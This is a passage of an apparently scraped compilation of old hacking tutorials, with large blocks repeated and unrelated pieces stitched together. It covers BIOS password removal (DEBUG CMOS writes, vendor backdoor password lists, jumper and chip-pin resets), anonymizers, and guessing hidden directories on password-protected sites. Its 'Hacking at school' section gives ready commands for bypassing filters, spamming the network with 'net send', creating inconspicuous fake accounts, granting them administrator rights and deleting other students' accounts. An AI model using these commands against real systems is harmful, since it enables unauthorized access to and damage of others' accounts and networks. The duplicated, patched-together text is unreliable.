Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.
Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.
Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13
NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.
Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13
Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.
Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .
Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.
Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.
That's all.
Clear Cmos, jumper.That is the way how I solve problem when customer forgets password.
More
There are a few different ways to reset the cmos, here's a few:
1. there are many default common passwords,
such as:
At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)
For Award BIOS' try these backdoor passwords:
AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx
For AMI BIOS' try these backdoor passwords:
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO
For PHOENIX BIOS' try this backdoor password:
phoenix
there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)
2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.
3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.
4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)
5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.
6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:
http://www.11a.nu/ibios.htm
http://natan.zejn.si/rempass.html
Good reading:
http://www.astalavista.com/library/...ios_hacking.txt
http://www.virtualplastic.net/html/misc_bios.html
Hacking your School, College
getting over the blocked sites
u can try google translator .. or one proxy which i found intresting was greenpips.com try that or . try this http://64.233.179.104/translate_c?hl=de&ie=UTF-8&oe=UTF-8&langpair=de%7Cen&u=http://www.your website.com/ change the last part to the website you like to access
contributed by
Muhajir.K.M
Hacking at school
This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.
There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!
How to get it all moving
An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do, they just can't do anything much about it.
First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write
command.com
and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you;)
Bypassing that pesky web filtering
Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
in your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!
For example: http://197.57.189.10 etc.
Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:
1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.
2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.
3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content:)
Sending messages out over the network
Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Varndean * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"
use commas to divide the names and NO SPACES between them.
Adding/modifying user accounts
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:
C:>net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'
C:>net user JohnSmith fruity /ADD
Right then, now that we can create accounts, let's delete them:)
C:>net user JohnSmith /DELETE
This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them:)
Let's give you admin priveleges:)
C:>net localgroup administrator JohnSmith /ADD
This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can't usually run
In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.
Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.
I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)
Anonymizers are online services that eliminate the trail of information that you leave behind, whilst surfing, so that your online activities cannot be traced back to you. The anonymizers vary in sophistication depending on the level of security and number of features that you require. Some anonymizers require the use of client software and others only require that you log onto their website before browsing other sites*.
How do Anonymizers work?
You essentially surf the Web through the anonymizer site, going to that site first and then routing all your pages from there. When you send a page request through the anonymizer, it acts like a super-proxy server, stripping off the header of each data packet, thus making your request anonymous. The requested page is then fed through the anonymizer back to your Web browser**.
In order to avoid being tracked, one can use an anonymous proxy to surf the web. An anonymous proxy makes sure your IP address does not get stored on the web server logs. Web servers log every ?GET? request made, together with date, hour, and IP. But if you are accessing the Internet through a proxy server, then the IP of the proxy is logged and not yours.
In case you do not go through an anonymous proxy, then you are actually risking vital information that belongs to you. For example, a hacker can easily find out your IP Address, your web browser, your Operating System and even the previous URL that you have visited. You can also be easily located geographically (provided one has the necessary software tools) because people can find out a whole lot of things that give your location. Like your hostname, your continent, your country, your city and even your Internet Service Provider.
Consider the scenario where a hacker gets access to your computer, he can find out your name, email address, telephone number, various user ID's and passwords, details about software you use and your preferences, locations of files and folders, the search strings that you used and literally hundreds of other personal things. All this information is stored in files like SYSTEM.ini, USER.dat, SYSTEM.dat etc. One very important file is the nsform??.TMP which stores all the data inside every Netscape form you've ever submitted, with and without SSL, when the submission failed or was cancelled.
What are Re-mailers?
Anonymous Re-mailers are services used to send e-mail messages, so that the recipient of the e-mail cannot determine the identity of the sender. Re-mailers strip off header information leading to the identity of the sender and often route a message through a chain of re-mailers before reaching the recipient. Many re-mailers also include some sort of message based encryption. Re-mailers are commonly used to protect the anonymity if the sender from the recipient, to prevent eavesdropping by a third party, or to post anonymously to newsgroups*.
How do Re-mailers Work?
An anonymous re-mailer is simply a computer connected to the Internet that forwards electronic mail or files to other addresses on the network. It also strips off the "header" part of the messages, which shows where they came from and who sent them. All the receiver can tell about a message's origin is that it passed through the re-mailer. Some re-mailers also allocate each sender an "anonymous ID", rather like a PO Box number, which it stores with the sender's address so that any replies reach them.***
All re-mailers are fairly effective at what they do and some even take an extra step and add encryption to all outgoing messages. In order to view header information sent via email messages in Outlook Express, select a message in your inbox, then select File | Properties | Details.
To view header information in m*c*s*t Outlook, right-click a message in your inbox and select Options; the header information is displayed in the Internet Headers area of the Message Options dialog box.
Anonymous re-mailers were invented by security experts interested to know whether it was possible to send a message on the Internet which could not be traced back to its source. As soon as the first ones were built, though, people found a more pragmatic use for them: to send messages to bulletin boards about subjects so sensitive that they did not want their names known.
Clear BIOS Password, All tricks !
**** New Trick **** :
At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)
A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q
Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.
Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.
Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.
Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.
Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13
NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.
Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13
Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.
Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .
Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.
Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.
That's all.
Clear Cmos, jumper.That is the way how I solve problem when customer forgets password.
More
There are a few different ways to reset the cmos, here's a few:
1. there are many default common passwords,
such as:
At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)
For Award BIOS' try these backdoor passwords:
AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx
For AMI BIOS' try these backdoor passwords:
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO
For PHOENIX BIOS' try this backdoor password:
phoenix
there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)
2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.
3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.
4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)
5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.
6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:
http://www.11a.nu/ibios.htm
http://natan.zejn.si/rempass.html
Good reading:
http://www.astalavista.com/library/...ios_hacking.txt
http://www.virtualplastic.net/html/misc_bios.html
Hacking your School, College
getting over the blocked sites
u can try google translator .. or one proxy which i found intresting was greenpips.com try that or . try this http://64.233.179.104/translate_c?hl=de&ie=UTF-8&oe=UTF-8&langpair=de%7Cen&u=http://www.your website.com/ change the last part to the website you like to access
contributed by
Muhajir.K.M
Hacking at school
This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.
There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!
How to get it all moving
An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do, they just can't do anything much about it.
First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write
command.com
and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you;)
Bypassing that pesky web filtering
Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
in your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!
For example: http://197.57.189.10 etc.
Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:
1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.
2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.
3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content:)
Sending messages out over the network
Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Varndean * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"
use commas to divide the names and NO SPACES between them.
Adding/modifying user accounts
Now that you have a command prompt, you can add a new user (ie yourself) like so
C:>net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:
C:>net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'
C:>net user JohnSmith fruity /ADD
Right then, now that we can create accounts, let's delete them:)
C:>net user JohnSmith /DELETE
This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them:)
Let's give you admin priveleges:)
C:>net localgroup administrator JohnSmith /ADD
This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can't usually run
In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.
Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.
I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)
warning : For educational purpose only
i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol
here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .
Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.
